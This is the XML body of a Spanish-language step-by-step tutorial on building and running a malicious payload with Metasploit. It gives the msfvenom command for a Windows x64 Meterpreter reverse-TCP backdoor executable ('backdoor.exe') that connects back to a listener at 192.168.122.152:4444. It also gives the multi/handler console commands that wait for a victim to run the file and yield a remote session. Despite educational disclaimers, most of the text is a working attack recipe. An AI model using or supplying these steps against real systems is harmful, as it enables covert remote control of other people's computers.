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8d878804e5c05be6cd15589bc249895e0604141"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Creando y Ejecutando un Payload Malicioso con Metasploit: Una Guía Paso a Paso</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Hola a todos! Hoy vamos a sumergirnos en el fascinante mundo de la seguridad informática y la creación de un payload malicioso usando Metasploit. Si bien esta guía es con fines educativos, es crucial recordar que utilizar estas herramientas para actividades maliciosas es ilegal y antiético. ¡Usémoslas para aprender y proteger!</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="27"/>
    <w:bookmarkStart w:id="28" w:name="X6fd5f2de1a29374c6c843eecf273683e6ec1496"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Paso 1: Obtener la Dirección IP con ifconfig</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Primero, necesitamos conocer nuestra dirección IP local para configurar el payload. Usamos el comando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para obtener esta información. Abre tu terminal y escribe:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="ExtensionTok"/>
        </w:rPr>
        <w:t xml:space="preserve">ifconfig</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Esto mostrará todas las interfaces de red y sus respectivas direcciones IP. Busca la IP de tu red local. En este ejemplo, supongamos que es</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">192.168.122.152</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">.</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="28"/>
    <w:bookmarkStart w:id="29" w:name="paso-2-crear-el-payload-con-msfvenom"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Paso 2: Crear el Payload con msfvenom</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Ahora que tenemos nuestra dirección IP, vamos a crear el payload. Usaremos</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">msfvenom</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, una herramienta que viene con Metasploit para generar payloads maliciosos. Queremos crear un payload que permita un acceso remoto a una máquina con Windows. Usamos el siguiente comando:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pP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LHOST=192.168.122.152 LPORT=4444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backdoor.exe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x64</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Desglosamos el comando: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-p windows/x64/meterpreter/reverse_tcp</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">: Especificamos el payload, que en este caso es un Meterpreter reverse TCP para Windows de 64 bits.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LHOST=192.168.122.152</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">: Establecemos nuestra dirección IP local como el host de escucha.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LPORT=4444</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">: Elegimos el puerto de escucha (puedes cambiarlo si es necesario).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-f exe</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">: Indicamos que el formato de salida debe ser un archivo ejecutable de Windows.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-o backdoor.exe</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">: Nombramos el archivo de salida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-a x64</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">: Especificamos la arquitectura del payload (64 bits).</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="29"/>
    <w:bookmarkStart w:id="30" w:name="Xf24951cc03a16e8693cb853fa7ba601c8f91e7c"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Paso 3: Configurar el Handler en Metasploit</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Una vez que tenemos nuestro payload, necesitamos configurar un handler en Metasploit para escuchar las conexiones entrantes. Iniciamos Metasploit con:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pP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p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">La opción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es para iniciar Metasploit en modo silencioso.</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="30"/>
    <w:bookmarkStart w:id="31" w:name="paso-4-configurar-el-exploit-handler"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Paso 4: Configurar el Exploit Handler</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">En la consola de Metasploit, seguimos estos pasos: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Seleccionar el handler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 exploit/multi/handler</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1000"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Esto indica que usaremos el módulo handler para gestionar la conexión entrante.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Configurar el payload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payload windows/x64/meterpreter/reverse_tcp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Establecer el LHOST y LPORT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lhost 192.168.122.152</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w: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lport 4444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Verificar las opciones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options</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1000"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Esto muestra todas las opciones configuradas para asegurar que todo esté correcto.</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="31"/>
    <w:bookmarkStart w:id="32" w:name="paso-5-ejecutar-el-handler"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Paso 5: Ejecutar el Handler</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Finalmente, ejecutamos el handler para empezar a escuchar conexiones:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="SourceCode"/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run</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Ahora, el handler está activo y esperando que alguien ejecute el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 </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">en su máquina. Cuando esto suceda, obtendrás una sesión de Meterpreter y podrás interactuar con la máquina comprometida.</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="32"/>
    <w:bookmarkStart w:id="33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Este proceso demuestra cómo se puede crear y manejar un payload malicioso usando Metasploit. Nuevamente, subrayo la importancia de utilizar este conocimiento de manera ética y legal, principalmente para probar y fortalecer la seguridad de sistemas. Siempre asegúrate de tener permiso para realizar estas pruebas.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Espero que hayas encontrado esta guía informativa y útil. ¡Hasta la próxima!</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="33"/>
    <w:bookmarkStart w:id="36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Ejecutando Payload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6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2025-04-05T19:18:15Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2025-04-05T19:18:15Z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